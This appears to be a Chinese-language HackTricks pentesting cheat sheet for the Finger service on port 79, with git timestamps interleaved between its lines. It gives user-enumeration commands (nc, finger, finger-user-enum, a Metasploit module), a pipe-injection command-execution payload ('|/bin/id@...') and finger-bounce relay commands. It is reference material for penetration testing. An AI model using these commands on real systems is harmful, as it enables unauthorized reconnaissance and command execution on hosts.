2024-02-08 04:42:06 +00:00
# 79 - 渗透测试 Finger
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 04:42:06 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-08 04:42:06 +00:00
支持 HackTricks 的其他方式:
2022-04-28 16:01:33 +00:00
2024-02-08 04:42:06 +00:00
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或 **关注** 我的 **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* 通过向 [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2023-08-03 19:12:22 +00:00
## **基本信息**
2020-07-15 15:43:14 +00:00
2024-02-08 04:42:06 +00:00
**Finger** 程序/服务用于检索有关计算机用户的详细信息。通常提供的信息包括**用户的登录名、全名**,有时还包括其他详细信息。这些额外的详细信息可能包括办公室位置和电话号码(如果有)、用户登录时间、空闲时间、用户上次阅读邮件的时间,以及用户计划和项目文件的内容。
2020-07-15 15:43:14 +00:00
2024-01-05 23:28:30 +00:00
**默认端口:** 79
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
PORT STATE SERVICE
79/tcp open finger
```
2023-08-03 19:12:22 +00:00
## **枚举**
2024-01-05 23:28:30 +00:00
### **横幅抓取/基本连接**
2020-07-15 15:43:14 +00:00
```bash
nc -vn < IP > 79
echo "root" | nc -vn < IP > 79
```
2023-08-03 19:12:22 +00:00
### **用户枚举**
2020-07-15 15:43:14 +00:00
```bash
finger @< Victim > #List users
finger admin@< Victim > #Get info of user
finger user@< Victim > #Get info of user
```
2024-02-08 04:42:06 +00:00
您也可以使用来自[pentestmonkey](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum)的**finger-user-enum**,一些示例:
2020-11-17 13:01:39 +00:00
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
2024-02-08 04:42:06 +00:00
#### **Nmap执行一个脚本来使用默认脚本**
2020-11-17 13:01:39 +00:00
2024-02-08 04:42:06 +00:00
### Metasploit使用的技巧比Nmap更多
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
use auxiliary/scanner/finger/finger_users
```
2022-05-08 23:13:03 +00:00
### Shodan
2020-07-15 15:43:14 +00:00
* `port:79 USER`
2023-08-03 19:12:22 +00:00
## 命令执行
2020-07-15 15:43:14 +00:00
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
2024-01-05 23:28:30 +00:00
## Finger Bounce
2020-07-15 15:43:14 +00:00
2024-02-08 04:42:06 +00:00
[使用系统作为指纹中继 ](https://securiteam.com/exploits/2BUQ2RFQ0I/ )
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
finger user@host@victim
finger @internal@external
```
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 04:42:06 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-08 04:42:06 +00:00
其他支持HackTricks的方式:
2022-04-28 16:01:33 +00:00
2024-02-08 04:42:06 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >